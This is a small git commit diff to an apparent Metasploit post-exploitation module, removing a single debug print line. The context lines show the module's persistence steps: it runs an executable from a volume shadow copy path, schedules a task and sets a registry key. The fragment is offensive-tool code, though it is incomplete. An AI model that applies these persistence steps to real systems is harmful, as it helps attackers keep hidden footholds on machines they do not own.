removed debugging prompts

bug/bundler_fix
MrXors 2013-10-14 00:29:24 -07:00
parent b505234bf6
commit 17e5c63f7f
1 changed files with 0 additions and 1 deletions

View File

@ -73,7 +73,6 @@ class Metasploit4 < Msf::Post
cmd_regex = /HarddiskVolumeShadowCopy\d{1,9}/.match("#{line}")
volume_data_id = "#{cmd_regex}"
end
print_good("#{volume_data_id}")
execute_executable(volume_data_id, @location, @file_name)
schtasks(volume_data_id, @location, @file_name)
regkey(@glogal_location)